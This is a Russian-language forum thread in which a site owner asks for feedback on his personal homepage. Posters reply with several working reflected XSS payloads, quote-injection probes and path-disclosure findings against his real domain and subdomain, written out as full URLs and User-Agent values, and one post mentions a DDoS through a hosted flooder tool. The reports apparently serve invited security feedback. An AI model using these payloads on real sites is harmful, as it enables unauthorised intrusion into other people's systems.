|
gibs0n.name
Доброго времени суток! Дописываю свою хоум пагу, мб есть какие то баги/пожелания/предложения по содержимому и по дизу прошу написать. Просто легче исправлять что то когда знаешь что именно нужно исправлять.
Авторам утилит которые выложенны на сайте, просьба отписаться если они не хотели бы их там видеть. Заранее спс. |
в утилите en\de(code) string проходят скрипты.
в ие все намного хуже, чем предыдущий скрин) http://gibs0n.name/tools/mail.php?dxparam="><script>alert()</script> |
XSS
Код:
POST / host='"/><script>alert(/1/)</script>Код:
POST /tools/dxval='"/><script>alert(/1/)</script>Короче почти во всех тулзах XSS |
дефейс кнопки)
http://gibs0n.name/tools/mail.php?dxparam=hacked |
Автоддос с помощью тулзы pinch flooder =)
xss для IE (в опере урлэнкодятся эти символы) http://gibs0n.name/index.php/";alert(99);" |
Раскрытие содержания кода если выделить шапку в http://gibs0n.name/?do=sniff&order='"/><script>alert(/1/)</script>
XSS если ввести в Host information: <script>alert("1")</script> |
Цитата:
во сновном ксс в тузлах сторонних разработчиков, буду исправлять=\ мб кто что скажет как можно диз по лучше сделать? |
http://gibs0n.name/?do=";alert()//
IE не кодирует кавычку и получается xss а, не увидел, нашли уже =) но там не в параметрах дело - запрос напрямую вставляется в скрипт |
Заапаем тему =)
Переписал сайт на симфони, еще не все дописано, но пока что есть http://gibs0n.name зы За конструктивные предложения с меня + зыы Кто хочет обменяться ссылками в личку или аську. |
XSS, раскрытие путей
http://gibs0n.name/poll_results/9999999')<img src=. onerror=alert()> Раскрытие путей можно найти в сорце, не вдавался в подробности, почему в браузере этот блок не показывается |
оО, скули и ксс там сразу отпадают, мб только если находиться в разработке как сейчас.
BlackSun: но на данный момент присутствует XSS :) |
http://fun.gibs0n.name/index.php/mainpage/category/id/'2
Цитата:
|
xss:
http://fun.gibs0n.name/index.php/mainpage/category/id/'2<script>alert(/SiXss/);</script> |
смотрим линк картинки:
http://fun.gibs0n.name/index.php/mainpage/view?id=2 [i]http://fun.gibs0n.name/img/2009/03/3c3a7891a6cabfd38c26673a7c712ec4.jpg[i] смотрим в папку: http://fun.gibs0n.name/img/2009/03/ ошибка Цитата:
XSS http://fun.gibs0n.name/img/2009/03/ в User-Agent: <script>alert(/xss/);</script> |
perhaps Overfload:
http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222 xss: http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222<script>alert(/x/);</script> http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222 User-Agent: <script>alert(/xss/);</script> |
Прикрутил поиск с помощью Sphinx. Знаю, что это немного глупо, но вещь действительно мощная и очень гибка. Поиск осуществлять одно удовольствие. Если кто знает как осуществлять переиндексацию, просьба отписаться в ПМ.
http://gibs0n.name/search Появился новый поддомен http://fun.gibs0n.name - пока в стадии разработки. Пока не знаю что там и как сделать, если у кого есть предложения, отписываемся в ПМ, постараюсь реализовать. предложения/пожелания в ПМ |
| Время: 01:12 |